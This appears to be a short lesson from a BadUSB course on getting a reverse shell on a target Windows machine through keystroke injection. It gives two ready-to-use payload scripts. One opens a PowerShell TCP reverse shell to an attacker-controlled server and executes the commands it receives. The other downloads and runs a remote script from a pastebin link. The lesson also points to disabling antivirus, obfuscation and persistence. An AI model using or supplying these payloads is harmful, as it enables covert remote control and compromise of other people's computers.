Reverse Shell

Getting access to the shell of the target computer is probably the ultimate goal of an attacker. With BadUSBs, it’s possible to make the target computer connect to the attacker and open up that vulnerability.

I based this lesson on the Hak5 Guide “A 3 Second Reverse Shell with the USB Rubber Ducky”.

I’m using a VPS to host the netcat server. You can also host it locally.

My BadUSB Script (extended version):

LOCALE DE
DELAY 5000
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 200
STRING $sm=(New-Object Net.Sockets.TCPClient("YOUR_SERVER_IP",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
ENTER

My BadUSB Script (short version):

LOCALE DE
DELAY 5000
GUI r
DELAY 200
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('LINK_TO_YOUR_PASTEBIN');"
ENTER

There are tons of ways to get a reverse shell. You can find plenty of other tutorials online. This example is just one simple way to do it. To improve the attack, you may want to look into ways of disabling antivirus software, malware obfuscating techniques, or how to make the reverse shell persistent. But that’s not part of this course.